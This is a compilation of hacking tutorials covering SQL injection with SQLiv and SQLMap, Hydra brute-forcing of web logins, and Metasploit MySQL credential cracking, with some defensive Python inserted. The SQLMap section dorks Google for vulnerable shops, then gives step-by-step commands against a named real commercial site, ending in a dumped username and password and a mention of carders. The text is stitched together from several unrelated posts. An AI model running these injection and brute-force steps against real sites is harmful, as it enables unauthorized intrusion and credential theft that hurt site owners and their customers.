
Hack Website Database Using Kali Linux



SQL Injection with Kali Linux.


The use of databases for data storage and management in web application development keeps growing. A database facilitates
interaction between users and servers. The database (or, in terms of a Database Management System, DBMS) provides various
benefits including data input and storage, retrieval of large amounts of information, and ease of compiling and grouping information.
But beside the ease and features a database offers, and its many uses in information technology, especially in website development,
pentesters and attackers are unceasingly trying to find gaps in database security. This is confirmed by a report from Positive Technologies,
an information security research center in Europe: in the second quarter of 2017 the top 10 web application attacks were dominated by
cross-site scripting at 39.1% and SQL injection at 24.9%. Positive Technologies said the second-quarter report is not much different from
the first quarter.
Figure 1. Top 10 web application attacks (source ptsecurity.com)
This is both interesting and worrying, because a database holds a lot of information such as credential accounts (admin and user), financial
details (credit cards, bank accounts, etc.) and so on. Also, SQL injection attacks do not always require expert injection skills; in that sense,
kids can do it, because there are many free applications that perform SQL injection automatically, such as SQLMap. SQLMap is an open source
penetration testing application that automates SQL injection attacks against a database security hole. Here I will show you how to do SQL
injection using SQLMap in Kali Linux. No special capabilities are required, but it helps if you know a scripting language or SQL database
technology.
This tutorial is recommended for those who are new to SQL injection in Kali Linux, just for fun, or who want to see how SQL injection works. It
is not recommended for those who are already highly skilled penetration testers.
SQL INJECTION USING SQLMAP IN KALI LINUX.
Before we do the injection attack, we must of course ensure that the server or target has a database security hole. There are several methods
for finding database security holes; among them, Google dorking is used mostly by hackers and penetration testers. Luckily there is a tool that
does this automatically, but we have to install it first. The tool is called SQLiv (SQL injection Vulnerability scanner).
STEP 1 : INSTALL SQLiv on KALI LINUX.
Type the commands below into your terminal to install SQLiv:
# git clone https://github.com/Hadesy2k/sqliv.git
# cd sqliv && sudo python2 setup.py -i
Once SQLiv is installed in your Kali Linux, it is stored at /usr/bin/sqliv, which you can call directly from the terminal by typing 'sqliv'.
Now let's take a look at SQLiv's features.
STEP 2 : FINDING SQL INJECTION VULNERABILITIES.
We will use Google dorking to scan for and find SQL injection holes in targets. Let's take a simple dork and let SQLiv scan through every target
and look for an e-commerce vulnerability with the URL pattern 'item.php?id='. To find other patterns just google for "google dork list".
# sqliv -d inurl:item.php?id= -e google -p 100
By default, SQLiv crawls the first page of the search engine, which on Google is 10 sites per page. Thus, here we set the argument -p 100 to
crawl 10 pages (100 sites). Based on the dork given above we got a result of vulnerable URLs that looks like this:
We found eight of the hundred URLs scanned to be considered vulnerable to SQL injection. Save the URLs in a text editor for the next
steps.
STEP 3 : SQL INJECTION USING SQLMAP.
Once we have at least one SQL injection vulnerable target, we execute the attack using SQLMap. I take one of them as the sample here.
First, we need to reveal the database name; inside the database are tables and columns, which contain the data.
A. ENUMERATE DATABASE NAME:
# sqlmap -u "TARGET URL" --dbs
-u / --url : target URL; --dbs : enumerate database name(s).
So the compiled command looks like this:
# sqlmap -u "http://www.acfurniture.com/item.php?id=25" --dbs
From the command above, the result should look like this:
We got the database name "acfurniture".
B. ENUMERATE TABLES NAME.
# sqlmap -u "TARGET URL" -D database-name --tables
So the compiled command looks like this:
# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture --tables
The result should look like this:
So far, we can conclude that the arrangement of data is: the site acfurniture.com has two databases, acfurniture and information_schema. The
database named acfurniture contains four tables: category, product, product_hacked, and settings. There is no compromised table name, but let's
investigate more. Let's see what is inside the settings table. Inside the table there are columns, and the data.
C. ENUMERATE COLUMNS.
# sqlmap -u "TARGET URL" -D database-name -T table-name --columns
So the compiled command looks like this:
# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings --columns
The output should look like this:
The settings table consists of 6 columns, and this is actually a credential account. Let's dump the data.
D. DUMP DATA.
# sqlmap -u "TARGET URL" -D database-name -T table-name -C columns --dump
So the compiled command looks like this:
# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings -C username,password --dump
Or you can dump all the data inside the table with:
# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings --dump
The output should look like this:
Email : [email protected] Username : Handsome Password : 9HPKO2NKrHbGmywzIzxUi
Alright, we are done dumping data from the database using SQL injection. The next task would be to find the door, i.e. the admin panel or admin
login page on the target site. Before that, check whether the password (9HPKO2NKrHbGmywzIzxUi) is encrypted or not; if so, it would need to be
decrypted first. That is another topic, cracking and decrypting.
Even though we are not actually hacking into the target site here, at least we have learned a lot about SQL injection using SQLMap in Kali Linux
easily, and we dumped the credential account. This technique is used mostly by carders (hackers looking for credit card accounts on e-commerce
sites), targeting financial, banking, shop, or e-commerce sites that store their users' credit card information.
Crack Web Based Login Page With Hydra in Kali Linux.
A password is technically defined as a secret string of characters used to authenticate or gain access to resources. It must be kept secret and
hidden from others who are not allowed to access those resources. Passwords have been used with computers since the earliest days of computing.
One of the first time-sharing systems, introduced in 1961, had a login command that requested a user password. After typing
"PASSWORD", the system turned off the printing mechanism, if possible, so that the user could type in his password with privacy.
The strength of a password is a function of its length, complexity, and unpredictability; it measures how effectively the password resists guessing
or breaking. Weak passwords, on the other hand, shorten the time needed to guess them and gain access to personal or corporate e-mail, sensitive
data like financial info, business info, credit cards, etc.
There are many ways a password can be weak, corresponding to the strengths of various attack schemes. The most popular kind of credential
attack is brute force: a trial-and-error method, like guessing, that attempts to decode encrypted data such as a password, used by an application
program or "hacking tool".
Hydra is the fastest network logon cracker and supports numerous attack protocols. It is very fast and flexible, and new modules are easy to
add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system
remotely. Hydra was written by van Hauser and is additionally supported by David Maciejak. In the latest update, Hydra development moved to the
public GitHub repository at https://github.com/vanhauser-thc/thc-hydra.
Hydra was tested to compile on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1, OpenBSD, OSX, QNX/Blackberry, and is made available
under GPLv3 with a special OpenSSL license expansion.
THC Hydra supports these protocols: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST,
HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-
Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5,
SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
COMPARING HYDRA WITH OTHER CRACKING TOOLS.
There are a lot of login cracker tools besides Hydra, however none supports such a huge list of protocols and parallelized login cracking like
Hydra does. The tables below show the feature, service and speed comparison against Medusa and Ncrack.
Features.
Feature | Hydra | Medusa | Ncrack
License | AGPLv3 | GPLv2 | GPLv2 + Nmap terms
IPv6 Support | Yes | No | No
Graphic User Interface | Yes | Yes | No
Internationalized support (RFC 4013) | Yes | No | No
HTTP proxy support | Yes | Yes | No
SOCKS proxy support | Yes | No | No
Supported protocols | 51 | 22 | 7
Services.
Service | Details | Hydra | Medusa | Ncrack
ADAM-6500 | | Yes | No | No
AFP | | Yes | Yes | No
Asterisk | | Yes | No | No
Cisco Password | | Yes | No | No
Cisco Enable | | Yes | No | No
CVS | | Yes | Yes | No
Firebird | | Yes | No | No
FTP | | Yes | Yes | Yes
FTP | SSL support | AUTH TLS & FTP over SSL | AUTH TLS & FTP over SSL | No
HTTP | Method(s) | GET, HEAD, POST | GET | GET
HTTP | Basic Auth | Yes | Yes | Yes
HTTP Form | Method(s) | GET, POST | GET, POST | No
HTTP Form | SSL support | HTTPS | HTTPS | No
HTTP Proxy | Basic Auth | Yes | No | No
HTTP Proxy | DIGEST-MD5 Auth | Yes | No | No
HTTP Proxy | NTLM Auth | Yes | No | No
HTTP Proxy | SSL support | HTTPS | No | No
HTTP PROXY URL Enumeration | | Yes | No | No
ICQ | v5 | Yes | No | No
IMAP | LOGIN support | Yes | Yes | No
IMAP | AUTH LOGIN support | Yes | No | No
IMAP | AUTH PLAIN support | Yes | Yes | No
IMAP | AUTH CRAM-MD5 support | Yes | No | No
IMAP | AUTH CRAM-SHA1 support | Yes | No | No
IMAP | AUTH CRAM-SHA256 support | Yes | No | No
IMAP | AUTH DIGEST-MD5 support | Yes | No | No
IMAP | AUTH NTLM support | Yes | Yes | No
IMAP | AUTH SCRAM-SHA1 support | Yes | No | No
IMAP | SSL support | IMAPS & STARTTLS | IMAPS & STARTTLS | No
IRC | General server password | Yes | No | No
IRC | OPER mode password | Yes | No | No
LDAP | v2, Simple support | Yes | No | No
LDAP | v3, Simple support | Yes | No | No
LDAP | v3, AUTH CRAM-MD5 support | Yes | No | No
LDAP | v3, AUTH DIGEST-MD5 support | Yes | No | No
MS-SQL | | Yes | Yes | No
MySQL | v3.x | Yes | Yes | No
MySQL | v4.x | Yes | Yes | No
MySQL | v5.x | Yes | Yes | No
NCP | | Yes | Yes | No
NNTP | USER support | Yes | Yes | No
NNTP | AUTH LOGIN support | Yes | No | No
NNTP | AUTH PLAIN support | Yes | No | No
NNTP | AUTH CRAM-MD5 support | Yes | No | No
NNTP | AUTH DIGEST-MD5 support | Yes | No | No
NNTP | AUTH NTLM support | Yes | No | No
NNTP | SSL support | STARTTLS & NNTP over SSL | No | No
Oracle Database | | Yes | Yes | No
Oracle | TNS Listener | Yes | No | No
Speed Comparison.
Speed (in s) | Hydra | Medusa | Ncrack
1 Task / FTP module | 11.93 | 12.97 | 18.01
4 Tasks / FTP module | 4.20 | 5.24 | 9.01
16 Tasks / FTP module | 2.44 | 2.71 | 12.01
1 Task / SSH v2 module | 32.56 | 33.84 | 45.02
4 Tasks / SSH v2 module | 10.95 | Broken | Missed
16 Tasks / SSH v2 module | 5.14 | Broken | Missed
That was a brief, simple introduction to Hydra. Now let's move on to installation.
INSTALLING HYDRA.
Hydra is pre-installed on Kali Linux; if you have a different operating system you can compile and install it on your system. Currently
Hydra supports these platforms:
All UNIX platforms (Linux, *BSD, Solaris, etc.), MacOS (basically a BSD clone), Windows with Cygwin (both IPv4 and IPv6), and mobile
systems based on Linux, MacOS or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq).
To download, configure, compile and install Hydra, just type into the terminal:
# git clone https://github.com/vanhauser-thc/thc-hydra
# cd thc-hydra
# ./configure
# make
# make install
If you have Ubuntu/Debian you will need some dependency libraries:
If you cannot find those libraries in your repository, you need to download and install them manually.
HOW TO USE HYDRA.
Congratulations, you have now succeeded in installing Hydra on your system. Hydra comes in two flavors, the GUI (gtk) and my favorite, the
CLI version. In addition Hydra also has a guided CLI version called "hydra-wizard": you will be guided step by step instead of typing all the
commands or arguments manually into the terminal. To run Hydra, from your terminal type:
For CLI : hydra
For CLI-wizard : hydra-wizard
For GUI : xhydra
After you type 'hydra' it will display the help text like this:
Bruteforce web based login with hydra.
Hydra supports some brute-forcing services as I mentioned earlier; one of them is used to brute-force web based logins such as social media
login forms, user banking login forms, your router's web based login, etc. The "http[s]-{get|post}-form" module handles this kind of request.
In this tutorial I am going to show you how to brute-force a vulnerable web login. Before we fire up Hydra we should know some needed
arguments, such as:
Target : http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F
Login username : admin (if you are not sure, brute-force this as well)
Password list : the location of the dictionary file containing possible passwords.
Form parameters : in general, use Tamper Data or a proxy to obtain the form's request parameters. Here I am using the network developer
toolbar of Iceweasel (Firefox based).
Service module : http-post-form.
Let's break down the command:
-l <username> : a single username; use -L <FILE> to refer to a file listing possible user names.
-P <FILE> : a file listing possible passwords; use -p <password> to try one literal password instead of guessing.
testasp.vulnweb.com : the hostname or target.
http-post-form : the service module we use.
"/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout" : the three parameters the module needs, in the syntax
path:form-parameters:S=success-string (a response containing "logout" counts as a successful login).
-v : verbose mode.
-V : show login:pass for each attempt.
-f : terminate the program once a login:password pair is found.
Now let's let Hydra try to break the password for us; it needs time since it is a dictionary attack. Once a login:password pair is found,
Hydra will immediately terminate the job and show the valid credential.
There is so much more that Hydra can do. In this tutorial we only learned how to brute-force a web based logon with one protocol, http-post-form.
We can also use Hydra against other protocols such as SSH, FTP, Telnet, VNC, proxy, etc.
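From the defender's side, the dictionary attack described above leaves a burst of POSTs to the login path from one source in the web server's access log. The following detector is an added example (not part of the original tutorial or of Hydra); the log lines, IP addresses, window length and threshold are constructed assumptions for the /Login.asp form used above.

```python
"""Added example (not part of the original tutorial): flag the burst of POSTs a
dictionary attack against /Login.asp produces in a web server's access log."""
import re
from collections import defaultdict, deque
from datetime import datetime

LOGIN_PATH = "/Login.asp"   # the form used in the Hydra walkthrough above
THRESHOLD = 5               # more than this many POSTs per window -> alert
WINDOW_SECONDS = 60         # sliding window length (assumed tuning value)

# Apache/nginx "combined" log format; only the fields we need are captured.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

# Constructed sample log: one client hammers the form, another logs in normally.
SAMPLE_LOG = """\
203.0.113.9 - - [10/Oct/2017:13:55:30 +0000] "GET /Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1" 200 1043
203.0.113.9 - - [10/Oct/2017:13:55:31 +0000] "POST /Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1" 200 1043
203.0.113.9 - - [10/Oct/2017:13:55:31 +0000] "POST /Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1" 200 1043
203.0.113.9 - - [10/Oct/2017:13:55:32 +0000] "POST /Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1" 200 1043
198.51.100.4 - - [10/Oct/2017:13:55:32 +0000] "POST /Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1" 200 1043
203.0.113.9 - - [10/Oct/2017:13:55:32 +0000] "POST /Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1" 200 1043
203.0.113.9 - - [10/Oct/2017:13:55:33 +0000] "POST /Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1" 200 1043
203.0.113.9 - - [10/Oct/2017:13:55:33 +0000] "POST /Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1" 302 211
198.51.100.4 - - [10/Oct/2017:13:57:10 +0000] "POST /Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1" 302 211
"""


def parse_line(line):
    """Return (ip, timestamp, method, path-without-query, status) or None."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]   # drop ?RetURL=... for matching
    return m.group("ip"), ts, m.group("method"), path, int(m.group("status"))


def detect_login_bursts(lines):
    """Map each source IP that exceeds THRESHOLD POSTs to LOGIN_PATH inside
    WINDOW_SECONDS to the time of its first alert (log lines in time order).
    Failed attempts against this form come back as 200 with the form again,
    so the status code is deliberately not used as the failure signal; the
    request rate from one source is."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        if method != "POST" or path != LOGIN_PATH:
            continue
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > WINDOW_SECONDS:
            window.popleft()
        if len(window) > THRESHOLD and ip not in alerts:
            alerts[ip] = ts
    return alerts


if __name__ == "__main__":
    for ip, first_seen in detect_login_bursts(SAMPLE_LOG.splitlines()).items():
        print("login burst from", ip, "first flagged at", first_seen.isoformat())
```

On the sample log only 203.0.113.9 is flagged, at the sixth POST within the window; the second client's two spaced-out attempts stay under the threshold.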
How To Hack A Website - Simple Demo | Kali Linux / BackTrack | Pranshu.
SQL injection has long been a web application security concern and yet there exists a plethora of websites still vulnerable to SQL injection
today. I refrain from any testing on such websites due to lack of explicit permission by owners. However, here's a demonstration, from one of my
penetration testing projects, of how these websites may be hacked if the SQL vulnerabilities are left unpatched.
Tip: Read up a little on SQL injection. For example, start with figuring out what this is trying to do:
SELECT * FROM users WHERE name = '' OR '1'='1';
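As an added example (not code from this post, from sqlmap, or from any site described on this page), here is the query from the tip built the vulnerable way and the parameterized way, plus the same defect for an item.php?id= style numeric parameter like the one in the SQLMap walkthrough earlier on this page. The table names, rows and inputs are constructed, and an in-memory SQLite database stands in for the web application's backend.

```python
"""Added example (not code from the tutorial, sqlmap or the site described):
the tip's query, SELECT * FROM users WHERE name = '' OR '1'='1', built the
vulnerable way and the parameterized way, plus the same defect for an
item.php?id= style numeric parameter like the one in the SQLMap walkthrough."""
import sqlite3

# Constructed sample rows; every name and value here is made up.
SAMPLE_USERS = [("admin", "not-a-real-hash"), ("alice", "x"), ("bob", "y")]
SAMPLE_ITEMS = [(25, "sofa"), (26, "table"), (27, "chair")]


def make_db():
    """In-memory SQLite database standing in for the web app's MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("CREATE TABLE product (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO product VALUES (?, ?)", SAMPLE_ITEMS)
    return conn


def find_user_vulnerable(conn, name):
    # String concatenation: a quote inside `name` closes the literal and the
    # rest of the input is parsed as SQL, which is what the tip's query shows.
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def find_user_safe(conn, name):
    # Bound parameter: the value travels separately from the SQL text, so
    # quotes and keywords in `name` are only characters to compare against.
    sql = "SELECT name FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


def find_item_vulnerable(conn, item_id):
    # item.php?id=25 style: the raw query-string value is spliced in unquoted,
    # so anything that is not a bare number rewrites the WHERE clause.
    sql = "SELECT id, name FROM product WHERE id = " + item_id
    return conn.execute(sql).fetchall()


def find_item_safe(conn, item_id):
    # Validate the type first, then bind it; non-numeric input never reaches SQL.
    try:
        id_value = int(item_id)
    except ValueError:
        return []
    sql = "SELECT id, name FROM product WHERE id = ?"
    return conn.execute(sql, (id_value,)).fetchall()


def demo():
    """Run both forms against the tautology from the tip and a numeric variant."""
    conn = make_db()
    tautology = "' OR '1'='1"
    return {
        "vuln_user": find_user_vulnerable(conn, tautology),   # every user
        "safe_user": find_user_safe(conn, tautology),         # no such user
        "vuln_item": find_item_vulnerable(conn, "25 OR 1=1"), # every product
        "safe_item": find_item_safe(conn, "25 OR 1=1"),       # rejected
        "safe_item_ok": find_item_safe(conn, "25"),           # the one row
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```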
The tool sqlmap comes preloaded with both Kali and Backtrack.
If the dynamic parameter in the php script is vulnerable then sqlmap will try to inject code into it.
I’ve blacked out the website’s information for obvious reasons.
First, get the tool to list the available databases:
The information_schema DB is where MySQL stores the schema, so I'm not interested in that one. The other one is my target.
I try to grab the ‘tables’ available in this other database:
There are a bunch of tables that get listed, among those the table ‘members’ looks interesting, grab the columns for that table:
And I see a column with passwords, I’ll get the hashes here (I’ve seen some web admins who are so careless that they store the passwords in
plaintext which would require no password cracking):
Finally, I get my hands on the password hashes and the reverse engineering begins from there (use jtr):
Unless you actually know what sqlmap did for you in the background, it is not that interesting and makes you a perfect script kiddie.
Once you crack the password hashes, you can log in to the website's control panel as 'admin' and then change HTML files (index.html for the
homepage). That would be website defacing.
Disclaimer: As stated in the beginning, this excerpt is from an authorized penetration test. If you notice an SQL weakness in a website, please
refrain from engaging in illicit activities and inform the web administrator.
Linux Hacking.
Learn about Linux Hacking Tools, How to Stop Hackers.
Background on Linux.
Linux is an open source operating system for computers. Linux is a Unix-like operating system, meaning that it supports multitasking and multi-user
operation. Linux is widely used for supercomputers, mainframe computers, and servers. Linux can also run on personal computers, mobile devices,
tablet computers, routers, and other embedded systems. One of the most prominent examples of this is the Android mobile operating system,
which is based on the Linux Kernel. Linux is capable of running many of the same applications and software as Windows and Mac OS X. Linux
operating systems, software, and applications are commonly referred to as Linux distributions (distros for short).
Linux Hacking.
Linux is an extremely popular operating system for hackers. There are two main reasons behind this. First off, Linux’s source code is freely
available because it is an open source operating system. This means that Linux is very easy to modify or customize. Second, there are countless
Linux security distros available that can double as Linux hacking software.
Generally speaking, there are two types of Linux hacking: hacking done by hobbyists and hacking done by malicious actors. Hobbyists are often
hackers looking for new solutions to software problems or tinkerers looking for new uses for their software/hardware. Malicious actors use Linux
hacking tools to exploit vulnerabilities in Linux applications, software, and networks. This type of Linux hacking is done in order to gain
unauthorized access to systems and steal data.
Linux Hacking Tools.
Malicious actors typically use tools such as password crackers, network and vulnerability scanners, and intrusion detection software. These Linux
hacking tools all serve different purposes and are used for a wide range of attacks.
Password crackers are software developed for decoding passwords in a variety of formats, such as encrypted or hashed passwords. Many
cracking distros offer additional functionality such as network detectors and wireless packet sniffing. Malicious actors use these Linux hacking tools
because they offer a simple way to gain access to an organization’s network, databases, directories, and more. Password cracking distros are
commonly used in Linux wifi hacking (Linux hacking that targets wireless networks).
Linux network scanners are used to detect other devices on a network. In doing so, attackers are able to develop a virtual map of the network. In
addition to discovering other devices, many network scanners are capable of gathering details about devices such as which operating systems,
software, and firewalls are being used. Network scanners are used to discover network security holes in Linux wifi hacking. They also can be used
to gather information useful for Linux distro hacking (Linux hacking that targets software, applications, operating systems, etc).
Linux vulnerability scanning software is used to detect vulnerabilities in systems and applications. Malicious parties often use vulnerability scanners
as Linux hacking software in order to detect exploitable vulnerabilities, gather simple passwords, discover configuration issues, and perform denial
of service attacks. Vulnerability scanners are frequently used for Linux distro hacking because of these capabilities.
Linux Hacking Prevention and Mitigation.
Fortunately, there are measures that organizations and individuals can take to lessen the risk and threat of Linux hacking. Many of these security
procedures use the same tools that malicious parties abuse in Linux hacking. Organizations can use the tools discussed above (password crackers,
network scanners, vulnerability scanners, wireless sniffers, intrusion detection systems, etc.) to test their software and networks from a hacker’s
perspective. Regular testing and monitoring using Linux hacking software gives organizations the opportunity to discover software and network
vulnerabilities before attackers.
Hacking MYSQL Database using Metasploit in Kali Linux.
Cyber reconnaissance is the most significant phase in staging an attack. Without prior knowledge of a victim and the weaknesses that can
help exploit the target, the attack cannot be generated successfully.
Talking about targets, the cyber world is not just the internet but a lot more than that. It is an entity of independent networks containing
telecommunication networks, databases, smart devices and web applications. There are different tricks and techniques to exploit each of them
depending on the information we get after reconnaissance.
Databases are a key target for cyber criminals due to the valuable information they store and a number of loopholes including deployment
failures, broken databases, data leaks, stolen database backups, lack of segregation, SQL injection and database inconsistencies.
Any information related to the database is advantageous to an attacker when it comes to generating an attack. Whether the information is about
the version of the database or its structure, it can render more juicy information to plan a strategy. If the database version is outdated, it can
easily be attacked by finding a suitable exploit. Moreover, weak credentials on a poorly secured database can enable credential reuse or
brute-forcing of credentials to compromise a highly secured database. Lastly, knowing the schema of the database is vital to performing a SQL
injection attack.
So today we are going to enumerate some of this information related to a MySQL database. We will use the Metasploit framework as it includes
many effective auxiliary modules to easily exploit the target. Use the Metasploit framework via Kali Linux and target Metasploitable2 to observe
the output.
Scanning.
The first step of reconnaissance is scanning the target. It will determine whether the MySQL database is running on the victim's machine. As we
know it runs on port 3306, use Nmap with the target's IP to scan the target:
It shows that MySQL is running on the target and the port is open.
It's time to enumerate this database and collect as much information as you can to plan a better strategy.
Execute the Metasploit framework by typing msfconsole at the Kali prompt:
Search for all MySQL modules that can be helpful to generate an exploit. Type search mysql:
It lists a number of modules. For now we are only concerned with the auxiliary scanners.
Cracking the Credentials.
Let's try the mysql_login module first to crack some valid MySQL credentials. Type the use command to load the module:
Type options to see the current settings of this module:
Now create a file containing a list of common usernames. I just prepared a short list for demonstration purposes, but in reality, publicly available
longer lists are used to crack the credentials. Name it as you want:
Add some common usernames and save it:
Again, create a file containing common passwords. Usually a longer list is used, but as it would take more time to complete the module we
keep it short. Add the passwords and save the file:
Set the created files, i.e. ehacking_user.txt and passwords.txt, so the module reads the usernames and passwords from them:
As MySQL allows login with a blank password, set this option to true to check for blank passwords:
Set the target IP address. Use the setg command to set this option globally, since we are going to execute all modules on the same target:
All settings are done; now run the module by typing exploit:
See the complete story published at the ehacking blog.
Posted by
Irfan Shakeel.
Cyber Security Consultant / Trainer, Founder & CEO - ehacking.
The steps to enumerate a MySQL database using a Metasploit module. #hacking #cybersecurity #technology #metasploit.
